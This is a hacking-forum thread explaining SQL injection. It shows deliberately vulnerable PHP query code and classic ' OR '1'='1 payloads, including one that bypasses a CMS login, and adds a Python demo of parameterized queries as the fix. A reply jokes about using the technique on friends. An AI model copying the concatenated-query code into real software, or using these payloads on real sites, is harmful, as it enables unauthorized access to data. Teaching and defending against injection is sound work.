SQL INJECTION EXPLAINED [EXTREMELY DETAILED]
Thread Owner: Murder, Category: General Hacking, 2 Comments, 976 Reads
#1 | Senior Member (325 messages, 160 threads, 0 rep, 4 years of service) | 05-25-2020, 06:05 AM
SQL INJECTION EXPLAINED
 
Introduction

Hello everyone! It is @Ghost. Today I will walk you through an in-depth explanation of the art of SQL Injection. SQL Injection is an extremely easy attack to perform; hence, most people watch a couple of tutorials online where some guy does an "attack" in 7 minutes on Kali Linux. Just because you do this, that doesn't make you a blackhat hacker or an SQLi expert. Trust me, I made the same mistake of following random tutorials without mastering the fundamentals. In order to carry out advanced SQL attacks, you need to have an intermediate to advanced knowledge of SQL.
This will be a long thread, so I can imagine people replying saying that I copy/pasted this, which is understandable. The guide I am writing is a summarized version of Justin Clarke's "SQL Injection Attacks and Defense", a 500-page book. All code and images used in this thread are from his book. However, the thread is written by me. Not a single sentence is copied from the said book. If you want to cross-check, be my guest. I'd be more than happy to send you the book. So, with that out of the way, let's start.
 
What is SQL Injection?

SQL Injection is a vulnerability that occurs when an attacker is able to influence SQL queries for malicious purposes while they pass to the backend database. The attacker is able to influence what is passed between the front end and the backend database. By doing so, he is able to gain extremely sensitive data such as usernames, passwords, locations, emails, IPs etc. and also to dump the entire database of the website. Even though most websites use encryption to store their users' passwords, with high-tech equipment with massive computational power becoming more and more available to the public, a hacker with the right equipment, or by outsourcing the hash-cracking process, is able to crack a very strong password within a couple of weeks at most. This is why SQL Injection is a very serious attack and why you should learn it if you want to become a good penetration tester.


 
Web Application Architecture
Before attacking a website, we must understand how the website operates and learn more about its architecture. Prior information about the target is extremely crucial in any attack, same goes with SQL Injection.
 
There are two main types of websites: static websites and dynamic websites. A static website is a site coded purely using HTML, CSS or JavaScript. Meanwhile, a dynamic site is a site that uses a database to store and retrieve data to make the website more interactive. Wix, WordPress etc. are dynamic site builders, while GatsbyJS and Jekyll are used to generate static websites.
 
In SQL Injection, we focus on dynamic or database-driven websites. The most common type of database-driven site is an e-commerce store. In a site like this, essential information like customer ID, product ID, prices, address, phone number etc. is stored in the site's database.
 
For example, say John signs up for an account on "X.com", an e-commerce store. When signing up, he provides information such as his full name, address, phone number etc. All this information will be stored in the client table of the website. When John wants to buy a pair of sunglasses, he searches for "Sunglasses"; the website then locates all items related to the query, in this case sunglasses, from the sunglasses table in the product database. This is how a database operates in a dynamic website: requesting queries and making updates in the database.
Here's an example PHP script that shows how the user input is passed to a dynamically created SQL statement.


<?php
// connect to the database
// (the mysql_* extension used in the book was removed in PHP 7; kept as in the book)
$conn = mysql_connect("localhost","username","password");
// dynamically build the sql statement with the input
// (the request parameter is concatenated straight into the SQL text;
// this is the injection point discussed further down)
$query = "SELECT * FROM Products WHERE Price < '{$_GET['val']}' " .
"ORDER BY ProductDescription";
// execute the query against the database
$result = mysql_query($query);
// iterate through the record set
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
// display the results to the browser (<br> gives line breaks in the HTML output)
echo "Description : {$row['ProductDescription']}<br>" .
"Product ID : {$row['ProductID']}<br>" .
"Price : {$row['Price']}<br><br>";
}
?>

 
The example above shows how the SQL statement is created by the PHP script. In the above case, the statement will return all products in the website's database with a value less than $100.
 
A web application mainly has three tiers.
  • Presentation Tier: The rendering engine. (Example: Web browser)
  • Logical Tier: Programming languages (C#, ASP, .NET, PHP)
  • Storage Tier: A Database Management System (MySQL, Oracle, Microsoft SQL Server)
 
Figure 01: A simple three-tier architecture [Image: 1.PNG]

 
The presentation tier, also known as the front end, is what the user sees. It displays various information related to browsing like prices, available products, discounts etc. The logical tier acts as a separate layer and handles the web application's functionality by performing high-level processing. The storage tier, or backend, is where all the data is stored and retrieved from. This tier is independent of the presentation and logical tiers.

 

Complex Web Application Architecture

The main drawback of using a three-tier model is that it is not scalable. For this reason, taking the concepts of scalability and maintainability, the n-tier application development paradigm was created. Within this paradigm, a four-tier solution was built where a special element called an Application Server was added that the three-tier model did not possess. An application server is a server whose main function is to host application programming interfaces (APIs) to expose the operational logic and processes for use by other applications.
 
Figure 02: A Four-Tier Architecture [Image: 2.PNG]

 
In the figure above, the web browser sends a specific request to the middle tier, which is the logic; the logic then calls the API from the application server and runs the request, adding or retrieving data from the database. Simply put, this is what happens in a four-tier model.


 
Diving Deep Into SQL Injection Attacks

SQL Injection is an attack where malicious SQL code is injected into the application, most commonly via the input parameters, which are then passed to the backend servers for execution. Due to the diverse nature of SQL, an attacker can write malicious code in many ways. Mainly and most commonly, direct insertion of code into parameters concatenated with SQL commands is the technique used. However, a less direct attack would be to inject malicious code into strings that are bound to be stored in the database, to be executed once they have been stored. An attacker is able to modify SQL statements, and in doing so receives the same rights as the application user.
 
I will explain this using the previous example. (products less than $100)
http://www.victimwebsite.com/products.php?val=100
We will now see how you can inject your own SQL commands by inserting them into the input parameter, which can be done by appending the string ' OR '1'='1 to the URL.
http://www.victimwebsite.com/products/su...p?val=100' OR '1'='1
When you run this URL, the PHP script will execute and return all the products that are in the database ignoring their prices. This happens because we modified and altered the logic of the query.
This is the query that was built:

SELECT *
FROM ProductsTbl
WHERE Price < '100.00' OR '1'='1'
ORDER BY ProductDescription;

 

This is an example of how an attacker can manipulate a SQL statement and gain access to data that should not be accessible to anyone.

 
Content Management Systems (CMS)

A content management system is basically a web application which is used to manage and publish content to a website without having any form of coding knowledge. 
Accessing the CMS application:
http://www.victimwebsite.com/cms/login.php?username=root&password=pass
In order to access a CMS’s functionality, it requires you to login with valid credentials; if not, a login error would occur.

<?php
// connect to the database
$conn = mysql_connect("localhost","username","password");
// dynamically build the sql statement with the input
// (parameter names match the login URL above: username and password)
$query = "SELECT userid FROM CMSUsers WHERE user = '{$_GET['username']}' " .
"AND password = '{$_GET['password']}'";
// execute the query against the database
$result = mysql_query($query);
// check to see how many rows were returned from the database
$rowcount = mysql_num_rows($result);
// if a row is returned then the credentials must be valid, so
// forward the user to the admin pages
if ($rowcount != 0){ header("Location: admin.php");}
// if a row is not returned then the credentials must be invalid
else { die('Incorrect username or password, please try again.');}
?>


 
Here is the SQL statement that the PHP script builds and executes:

SELECT userid
FROM CMSUsers
WHERE user = 'root' AND password = 'pass';

Similar to what we did earlier, we can modify the logic of the query so that we can obtain all "userid"s.
http://www.victimwebsite.com/cms/login.php?username=root&password=pass' OR '1'='1
 
This is the query that will be built and executed:
SELECT userid
FROM CMSUsers
WHERE user = 'root' AND password = 'pass' OR '1'='1';
If the database returns more than zero records, that means our logic is correct and our script has been given access to the admin.php script.
 
High Profile Incidents
[spoiler]
In February 2002, Jeremiah Jacks (www.securityfocus.com/news/346) discovered that Guess.com was vulnerable to SQL injection. He gained access to at least 200,000 customers’ credit card details.
In June 2003, Jeremiah Jacks struck again, this time at PetCo.com (www.securityfocus.com/news/6194), where he gained access to 500,000 credit card details via an SQL injection flaw.
On June 17, 2005, MasterCard alerted some of its customers to a breach in the security of Card Systems Solutions. At the time, it was the largest known breach of its kind. By exploiting an SQL injection flaw (www.ftc.gov/os/caselist/0523148/0523148complaint.pdf), a hacker gained access to 40 million credit card details.
In December 2005, Guidance Software, developer of EnCase, discovered that a hacker had compromised its database server via an SQL injection flaw (www.ftc.gov/os/caselist/0623057/0623057complaint.pdf), exposing the financial records of 3,800 customers.
Circa December 2006, the U.S. discount retailer TJX was successfully hacked and the attackers stole millions of payment card details from the TJX databases.
In August 2007, the United Nations Web site (www.un.org) was defaced via SQL injection vulnerability by an attacker in order to display anti-U.S. messages (http://news.cnet.com/8301-10784_3-9758843-7.html).
[/spoiler]

++++ THREAD WILL BE UPDATED WITHIN THE WEEK ++++
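The following is an added example, not code from the original post or from Clarke's book. It rebuilds the two queries the post walks through (the Products price lookup and the CMSUsers login) against an in-memory SQLite database, first with the string concatenation the PHP snippets use and then with bound parameters, so the tautology the post describes can be observed and the fix checked. Python with sqlite3 is used because it runs offline with no server; table and column names follow the post, while the sample rows, the make_db helper and the function names are assumptions made here.

```python
# Added example (not from the original post or from Clarke's book): the post's
# Products and CMSUsers queries built the vulnerable way and the hardened way,
# run against an in-memory SQLite database with constructed sample rows.
import sqlite3

PRODUCT_ROWS = [  # constructed sample data
    (1, "Aviator sunglasses", 79.99),
    (2, "Ski goggles", 120.00),
    (3, "Reading glasses", 15.50),
]
CMS_USER_ROWS = [  # constructed sample data
    (1, "root", "S3cr3t!"),
    (2, "alice", "hunter2"),
]


def make_db():
    """Create the two tables named in the post and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProductID INTEGER PRIMARY KEY, "
                 "ProductDescription TEXT, Price REAL)")
    conn.execute("CREATE TABLE CMSUsers (userid INTEGER PRIMARY KEY, "
                 "user TEXT, password TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?)", PRODUCT_ROWS)
    conn.executemany("INSERT INTO CMSUsers VALUES (?, ?, ?)", CMS_USER_ROWS)
    return conn


# --- vulnerable form: the request value is spliced into the SQL text ---------

def build_products_query(val):
    # Same shape as the post's PHP: the value lands inside the quotes.
    return ("SELECT * FROM Products WHERE Price < '%s' "
            "ORDER BY ProductDescription" % val)


def build_login_query(username, password):
    return ("SELECT userid FROM CMSUsers WHERE user = '%s' "
            "AND password = '%s'" % (username, password))


def products_concatenated(conn, val):
    """ProductIDs returned by the concatenated query."""
    return [row[0] for row in conn.execute(build_products_query(val))]


def login_concatenated(conn, username, password):
    """userids returned by the concatenated login query."""
    return [row[0] for row in conn.execute(build_login_query(username, password))]


# --- hardened form: validate the type, then bind the value as a parameter ----

def products_parameterized(conn, val):
    """ProductIDs cheaper than val; returns None if val is not a number.

    Price is numeric, so the input must parse as a number before it is used.
    A quote, an OR, or anything else non-numeric never reaches the database
    (a web handler would answer such a request with HTTP 400).
    """
    try:
        price = float(val)
    except ValueError:
        return None
    query = "SELECT * FROM Products WHERE Price < ? ORDER BY ProductDescription"
    return [row[0] for row in conn.execute(query, (price,))]


def login_parameterized(conn, username, password):
    """userids matching the credentials, with both values bound as parameters.

    The driver sends the SQL text and the values separately, so a quote inside
    the password is data compared against the column, not part of the statement.
    """
    query = "SELECT userid FROM CMSUsers WHERE user = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    db = make_db()
    tautology = "100' OR '1'='1"
    print(build_products_query(tautology))          # the WHERE clause is now always true
    print(products_concatenated(db, "100"))         # only the products under 100
    print(products_concatenated(db, tautology))     # every product, prices ignored
    print(products_parameterized(db, tautology))    # None: rejected before any SQL runs
    print(login_concatenated(db, "root", "pass' OR '1'='1"))    # every userid, no password known
    print(login_parameterized(db, "root", "pass' OR '1'='1"))   # []: treated as a literal password
```

The two build_* functions return the statement text so the effect of the appended quote can be read directly: for the login case the result is exactly the `WHERE user = 'root' AND password = 'pass' OR '1'='1'` statement shown in the post, where the OR binds last and makes the whole condition true. Bound parameters fix the login; for the numeric price a type check is added as well, because a numeric column compared against an unparseable string would otherwise fall back to the engine's type-coercion rules rather than an error.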
#2 | Junior Member (20 messages, 3 threads, 0 rep, 4 years of service) | 05-25-2020, 06:25 AM
Beautifully detailed guide man, and a really great base for people to begin on that learning experience.
Thank you!

Of course only meant for people to prank their friends! :pepelaugh: lmao
#3 | Senior Member (325 messages, 160 threads, 0 rep, 4 years of service) | 05-25-2020, 06:29 AM
Thank you for the kind comment @MrC. Appreciate it.